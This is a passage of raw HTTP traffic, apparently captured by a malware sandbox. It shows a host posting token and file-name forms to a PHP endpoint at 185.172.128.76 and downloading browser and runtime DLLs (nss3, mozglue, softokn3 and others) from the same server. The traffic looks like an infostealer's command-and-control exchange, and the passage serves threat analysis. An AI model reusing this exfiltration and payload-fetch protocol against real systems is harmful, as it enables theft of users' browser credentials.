name="file_name"NTE5MTkxODg1LmZpbGU=------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file"------HIIIEGDBKJKEBGCBAFCF--
Apr 23, 2024 09:43:18.163660049 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:19.126265049 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file"------AAEBAFBGIDHCBFHIECFC--
Apr 23, 2024 09:43:19.451155901 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:20.259871960 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:20.569632053 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:20 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 23, 2024 09:43:21.752501965 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:22.062078953 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:21 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 23, 2024 09:43:22.517607927 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:22.825726032 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:22 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 23, 2024 09:43:25.216989994 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:25.525017977 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:25 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 23, 2024 09:43:26.902467966 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:27.213639021 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:27 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 23, 2024 09:43:27.492023945 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:27.797914028 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:27 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 